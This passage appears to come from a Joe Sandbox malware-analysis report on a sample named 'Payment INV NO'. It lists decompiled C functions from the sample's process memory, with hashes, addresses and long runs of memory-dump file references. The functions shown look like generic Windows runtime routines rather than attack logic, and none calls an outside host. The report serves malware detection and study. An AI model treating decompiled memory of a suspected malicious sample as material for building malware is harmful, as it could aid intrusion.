                                                          • Opcode ID: 6eef36fb6508366aee266927f15ba3a4505a48d0daacbbdef1490b7954438228
                                                          • Instruction ID: 0bb0176df738f9563ddd25358b2415cc71a4c633b47aee5cbef0204333a46acc
                                                          • Opcode Fuzzy Hash: 6eef36fb6508366aee266927f15ba3a4505a48d0daacbbdef1490b7954438228
                                                          • Instruction Fuzzy Hash: 89E02633514246ABD722961CC582726B7F8FB51F58F20CC6EF486CF482D3A8E681C688
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01792CDB Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E01792CDB(signed char __ecx) {
				signed char _t9;

				_t9 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x2c)));
					E017D95C0();
				}
				if( *_t9 != 0) {
					_push( *_t9);
					E017D95D0();
				}
				return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t9);
			}




                                                          0x01792cde
                                                          0x01792ce4
                                                          0x017ef970
                                                          0x017ef972
                                                          0x017ef975
                                                          0x017ef975
                                                          0x01792ced
                                                          0x01792d02
                                                          0x01792d04
                                                          0x01792d04
                                                          0x01792d01

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d933d2c5922cf55fc83ccf04c9c80fe31aeff7266f8dd96e7937702cf0dd2f2
                                                          • Instruction ID: 85a74e09cc482d00fa9de874f7581d19d008d676b19e57e5300e45c39862e3e8
                                                          • Opcode Fuzzy Hash: 5d933d2c5922cf55fc83ccf04c9c80fe31aeff7266f8dd96e7937702cf0dd2f2
                                                          • Instruction Fuzzy Hash: 59E08C31040250FFDF323A28EC08F92F6B1BB55710F200569E182055EA8B709C85DB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CA185 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18867e4 >= 0xa) {
					if(_t5 < 0x1886800 || _t5 >= 0x1886900) {
						return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E017B0010(0x18867e0, _t5);
				}
			}





                                                          0x017ca190
                                                          0x017ca1a6
                                                          0x017ca1c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ca192
                                                          0x017ca192
                                                          0x017ca19f
                                                          0x017ca19f

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c4b7942c54c16c8403cee337945e51a15e409a8b014b3afcebe18571d42b4d0
                                                          • Instruction ID: 545bc71d417b36c7391cd24d3aa4864b57dea5b10c3621899f978a96b9fe7658
                                                          • Opcode Fuzzy Hash: 1c4b7942c54c16c8403cee337945e51a15e409a8b014b3afcebe18571d42b4d0
                                                          • Instruction Fuzzy Hash: 65D02EA11200041BC72D33109C98B26B232F7C0F61F34080CF3078B9EAFA60CDD88249
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B7D30 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E017B7D30(void* __ecx) {
				signed char _t8;

				_t8 =  *0x1888664; // 0x0
				if((_t8 & 0x00000001) != 0) {
					if((_t8 & 0x00000002) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						_push( *0x188634c);
						return 0 | __ecx !=  *((intOrPtr*)(L0185BD32( *0x1886348)));
					}
				} else {
					L1:
					return 0;
				}
			}




                                                          0x017b7d30
                                                          0x017b7d39
                                                          0x017ffd23
                                                          0x00000000
                                                          0x017ffd39
                                                          0x017ffd39
                                                          0x017ffd53
                                                          0x017ffd53
                                                          0x017b7d3f
                                                          0x017b7d3f
                                                          0x017b7d41
                                                          0x017b7d41

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6eaf99d96be8f79e42695e4159fa80b8f616f545e758c25278fd9f858b198cba
                                                          • Instruction ID: 37c5b91237dde0071cf10c7e746af79a9bf6399cce456a7a9ba4a7e6ad8b9e62
                                                          • Opcode Fuzzy Hash: 6eaf99d96be8f79e42695e4159fa80b8f616f545e758c25278fd9f858b198cba
                                                          • Instruction Fuzzy Hash: 31E012313402018FDB6ACA1CD594F697762EFA1644F154468E502C65A9D735D991DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C3E70 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C3E70(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t10;
				void* _t12;
				void* _t14;
				void* _t15;

				_t11 = _a4;
				if(_a4 == 0 || _a8 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					L018688F5(_t10, _t11, _t12, _t14, _t15, __eflags);
					return 0xc000000d;
				} else {
					return E017C37EB(_t10, _t11, 0, _t14, _t15, 0);
				}
			}








                                                          0x017c3e75
                                                          0x017c3e7a
                                                          0x017c3e9c
                                                          0x00000000
                                                          0x017c3e91
                                                          0x00000000
                                                          0x017c3e93

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
                                                          • Instruction ID: 1b6741df0c065331ffc1a732b2947ed463c1a7d75ff8a920e0f440e3b1323fbc
                                                          • Opcode Fuzzy Hash: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
                                                          • Instruction Fuzzy Hash: A3E08C316003489FEB21BA1D8088B65B7957B88F20F04C01DA4084B501CB38D880CF01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C16E0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E017C1710(0x18867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return E017B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                          0x017c16e8
                                                          0x017c16ef
                                                          0x017c16f3
                                                          0x017c16fe
                                                          0x00000000
                                                          0x017c1700
                                                          0x017c170d
                                                          0x017c170d
                                                          0x017c16f2
                                                          0x017c16f2
                                                          0x017c16f2
                                                          0x017c16f2

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bf3a92921a3263188d78603cb6895b6d1e6d10b1ef1c3473226de9c71e03c84
                                                          • Instruction ID: 56829d26893abec823980aa1831d2dc04f0d826db32713aa2ef1e15dc1698b8f
                                                          • Opcode Fuzzy Hash: 6bf3a92921a3263188d78603cb6895b6d1e6d10b1ef1c3473226de9c71e03c84
                                                          • Instruction Fuzzy Hash: 8CD0A731100101D2EA2D6B149848B147651EB90F85F78007CF30B594C2DFB0CD92E048
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179DB40 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = E017B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                          0x0179db4d
                                                          0x0179db54
                                                          0x0179db5f
                                                          0x0179db56
                                                          0x0179db56
                                                          0x0179db5c
                                                          0x0179db5c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction ID: 949a8b62cba8fe6f47a4277493b23a0eb8c5cceda4aa2596b96312b39c98b061
                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction Fuzzy Hash: 35C08C30290A01AAEB321F20CD01B40BAA0BB10B05F4400A06302DA0F0DB78DC01E600
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179F340 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179F340() {

				if(E017B7D50() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1c));
				} else {
					return  *0x7ffe02f0 >> 0x00000008 & 0x00000001;
				}
			}



                                                          0x0179f347
                                                          0x017f5cb0
                                                          0x0179f34d
                                                          0x0179f357
                                                          0x0179f357

